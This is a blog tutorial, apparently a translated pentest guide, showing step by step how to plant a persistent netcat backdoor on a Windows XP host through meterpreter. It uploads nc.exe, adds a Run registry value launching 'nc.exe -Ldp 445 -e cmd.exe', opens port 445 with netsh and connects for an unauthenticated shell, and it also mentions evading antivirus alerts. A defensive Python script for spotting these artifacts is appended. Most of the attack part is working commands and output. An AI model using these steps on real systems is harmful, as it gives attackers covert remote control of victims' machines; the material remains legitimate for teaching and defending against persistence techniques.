Persistent Netcat Backdoor

  In this example, instead of looking up information on the remote system, we will be installing a netcat backdoor. This includes changes to the system registry and firewall.

First, we must upload a copy of netcat to the remote system.


meterpreter > upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32
[*] uploading  : /tmp/nc.exe -> C:\windows\system32
[*] uploaded   : /tmp/nc.exe -> C:\windows\system32nc.exe

  Afterwards, we work with the registry to have netcat execute on start up and listen on port 445. We do this by editing the key ‘HKLM\software\microsoft\windows\currentversion\run’.

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

  Values (3):

    VMware Tools
    VMware User Process
    quicktftpserver

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'
Successful set nc.
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
Key: HKLM\software\microsoft\windows\currentversion\Run
Name: nc
Type: REG_SZ
Data: C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe

  The built-in command-line reg command also works, provided the system's antivirus software does not raise an alert:


REG ADD HKLM\software\microsoft\windows\currentversion\run /v nc /t REG_SZ /d "c:\xxx.exe"

  Next, we need to alter the system to allow remote connections through the firewall to our netcat backdoor. We open up an interactive command prompt and use the ‘netsh’ command to make the changes as it is far less error prone than altering the registry directly. Plus, the process shown should work across more versions of Windows, as registry locations and functions are highly version and patch level dependent.

meterpreter > execute -f cmd -i
Process 1604 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Jim\My Documents > netsh firewall show opmode
Netsh firewall show opmode

Domain profile configuration:
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable

Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable

Local Area Connection firewall configuration:
-------------------------------------------------------------------
Operational mode                  = Enable

  We open up port 445 in the firewall and double-check that it was set properly.

C:\Documents and Settings\Jim\My Documents > netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL
netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL
Ok.

C:\Documents and Settings\Jim\My Documents > netsh firewall show portopening
netsh firewall show portopening

Port configuration for Domain profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service

Port configuration for Standard profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
445    TCP       Enable   Service Firewall
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service


C:\Documents and Settings\Jim\My Documents >

  So with that being completed, we will reboot the remote system and test out the netcat shell.

root@kali:~# nc -v 172.16.104.128 445
172.16.104.128: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [172.16.104.128] 445 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Jim > dir
dir
Volume in drive C has no label.
Volume Serial Number is E423-E726

Directory of C:\Documents and Settings\Jim

05/03/2009 01:43 AM <DIR> .
05/03/2009 01:43 AM <DIR> ..
05/03/2009 01:26 AM 0 ;i
05/12/2009 10:53 PM <DIR> Desktop
10/29/2008 05:55 PM <DIR> Favorites
05/12/2009 10:53 PM <DIR> My Documents
05/03/2009 01:43 AM 0 QCY
10/29/2008 03:51 AM <DIR> Start Menu
05/03/2009 01:25 AM 0 talltelnet.log
05/03/2009 01:25 AM 0 talltftp.log
4 File(s) 0 bytes
6 Dir(s) 35,540,791,296 bytes free

C:\Documents and Settings\Jim >

  Wonderful! In a real-world situation, we would not use a backdoor as simple as this one, with no authentication or encryption. However, the principles of this process remain the same for other changes to the system and for other sorts of programs one might want to execute on startup.
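
The two artifacts this walkthrough leaves on the host, a Run value that starts a listener and a firewall port opening under a new rule name, can be audited together. The following Python is an added example, not part of the original post: it parses the Run-key data and the `netsh firewall show portopening` format shown above; the function names, the baseline set and the netcat-style flag heuristic are assumptions of the example.

```python
import re

# Rule names of the stock exceptions, as listed in the Domain profile output above.
BASELINE = {"NetBIOS Session Service", "SMB over TCP",
            "NetBIOS Name Service", "NetBIOS Datagram Service"}
PROFILE = re.compile(r"Port configuration for (.+?) profile:")
ROW = re.compile(r"(\d+)\s+(TCP|UDP)\s+(Enable|Disable)\s+(.+)")

def parse_portopenings(text):
    """Parse 'netsh firewall show portopening' into (profile, port, proto, mode, name)."""
    rows, profile = [], None
    for line in map(str.strip, text.splitlines()):
        if m := PROFILE.fullmatch(line):
            profile = m.group(1)
        elif profile and (m := ROW.fullmatch(line)):
            rows.append((profile, int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return rows

def listener_port(data):
    """Port of a netcat-style listener that execs a program (-l/-L, -e, -p N), else None."""
    tokens = data.split()
    flags = [t[1:] for t in tokens if re.fullmatch(r"-[A-Za-z]+", t)]
    if not (any("l" in f.lower() for f in flags) and any("e" in f for f in flags)):
        return None
    for flag, arg in zip(tokens, tokens[1:]):
        if re.fullmatch(r"-[A-Za-z]*p", flag) and arg.isdigit():
            return int(arg)
    return None

def audit(run_values, netsh_text):
    """Return (value name, port, profiles where a non-baseline rule opens that port)."""
    rows, findings = parse_portopenings(netsh_text), []
    for name, data in run_values.items():
        if (port := listener_port(data)) is not None:
            profiles = sorted({prof for prof, p, _, mode, rule in rows
                               if p == port and mode == "Enable" and rule not in BASELINE})
            findings.append((name, port, profiles))
    return findings

# Sample input: "nc" data and netsh rows come from the session above; VMware data is constructed.
RUN_VALUES = {"VMware Tools": r"C:\Program Files\VMware\VMware Tools\VMwareTray.exe",
              "nc": r"C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe"}
NETSH = """Port configuration for Domain profile:
445    TCP       Enable   SMB over TCP
Port configuration for Standard profile:
445    TCP       Enable   Service Firewall
445    TCP       Enable   SMB over TCP
138    UDP       Enable   NetBIOS Datagram Service
"""
```

Calling `audit(RUN_VALUES, NETSH)` reports the `nc` value with port 445 and the Standard profile, where the "Service Firewall" rule duplicates the stock SMB exception under a name that is not in the baseline.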


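  Using sc to create a custom service is another way to leave a backdoor, but one problem is that 360 still raises an alert to prevent the registry from being written.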

Author: NONO
Source: http://www.cnblogs.com/diligenceday/

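Author of this article: 方方和圆圆

Article link: https://www.cnblogs.com/diligenceday/p/6882085.html

Copyright notice: This work is licensed under the Creative Commons Attribution-NonCommercial-NoDerivs 2.5 China Mainland license.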
